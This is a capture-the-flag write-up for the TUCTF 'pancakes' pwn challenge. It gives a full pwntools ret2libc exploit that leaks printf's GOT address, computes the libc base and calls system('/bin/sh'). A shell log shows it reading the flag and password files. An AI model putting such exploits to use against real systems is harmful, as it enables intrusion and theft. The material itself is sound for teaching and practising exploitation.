Rating:

### Given a binary with the detail below
```
chao at Yu in [~/Documents/WriteUps/TUCTF/pwn/pancakes] on git:master ✗ 7e4a166 "Added so many new pwn"
17:17:35 › file pancakes && checksec pancakes
pancakes: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=a653a608db5ab4716ca7b1e891ee3b460e097eb8, for GNU/Linux 3.2.0, not stripped
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/pancakes/pancakes'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
```

The first thing comes through my mind is **ret2libc** to get shell. So immidiately i tried to leak libc, overwrite the return address with **printf plt** and set the argument with the **GOT address** and set the next address to **main** so it will print the **GOT address** and return back to **main**

```
from pwn import *

def exploit(p, libc, libc_diff):
binary = ELF("pancakes")
main = binary.symbols['main']
printf_plt = binary.plt['printf']
printf_got = binary.got['printf']
padding = 44

payload = ''
payload += 'A' * padding
payload += p32(printf_plt)
payload += p32(main)
payload += p32(printf_got)

p.sendline(payload)
```
After leaking the libc address, we calculate the base address and overwrite the return address to **system** with argument address of **/bin/sh** so it will execute **system("/bin/sh")**

```
p.recvuntil("Try harder\n")

libc_leak = u32(p.recv(4))
log.info("Libc leak : {}".format(hex(libc_leak)))
libc.address = libc_leak - libc_diff
log.info("Libc base address : {}".format(hex(libc.address)))
libc_system = libc.symbols['system']
log.info("Libc system : {}".format(hex(libc_system)))
libc_binsh = libc.search("/bin/sh").next()
log.info("Libc /bin/sh : {}".format(hex(libc_binsh)))

payload = ''
payload += 'A' * padding
payload += p32(libc_system)
payload += "JUNK"
payload += p32(libc_binsh)

p.sendline(payload)
sleep(1)
p.sendline("ls -la && cat f* && cat pass*")
p.interactive()

if __name__ == "__main__":
if len(sys.argv) < 2:
log.info("Argument needed!")
log.info("Usage: python {} <local/remote>".format(sys.argv[0]))
sys.exit(0)
elif sys.argv[1] == "local":
p = process("./pancakes")
libc = ELF("libc6_2.27-3ubuntu1_i386.so")
exploit(p, libc, 0x0512d0)
elif sys.argv[1] == "remote":
p = remote("chal.tuctf.com", 30503)
libc = ELF("libc6_2.27-3ubuntu1_i386.so")
exploit(p, libc, 0x0512d0)
else:
sys.exit(0)
```

Run the exploit and we got a shell
```
chao at Yu in [~/Documents/WriteUps/TUCTF/pwn/pancakes] on git:master ✗ 7e4a166 "Added so many new pwn"
17:17:44 › python exploit.py local
[+] Starting local process './pancakes': pid 6398
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/pancakes/libc6_2.27-3ubuntu1_i386.so'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/pancakes/pancakes'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] Libc leak : 0xf7d7c2d0
[*] Libc base address : 0xf7d2b000
[*] Libc system : 0xf7d68200
[*] Libc /bin/sh : 0xf7ea90cf
[*] Switching to interactive mode
�!��@+��0\x17���=��\xb02��0\xb7���&��Enter pancake password
> Try harder
total 1940
drwxrwxr-x 2 chao chao 4096 Des 2 01:46 .
drwxrwxr-x 9 chao chao 4096 Des 2 01:46 ..
-rw-rw-r-- 1 chao chao 1564 Des 2 01:43 exploit.py
-rw-r--r-- 1 chao chao 18 Des 2 00:57 flag.txt
-rw------- 1 chao chao 200 Des 2 01:32 .gdb_history
-rw-rw-r-- 1 chao chao 1942840 Nov 30 21:49 libc6_2.27-3ubuntu1_i386.so
-rwxrwxr-x 1 chao chao 15696 Des 2 00:54 pancakes
-rw-r--r-- 1 chao chao 5 Des 2 00:59 password.txt
flag{test_chall}
AAAA
$ id
uid=1000(chao) gid=1000(chao) groups=1000(chao),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),999(docker)
```

Original writeup (https://github.com/ChaO-0/WriteUps/blob/master/TUCTF/pwn/pancakes/exploit.py).
omaroobaniessaDec. 10, 2019, 10:34 a.m.

can you explain how u got libc_diff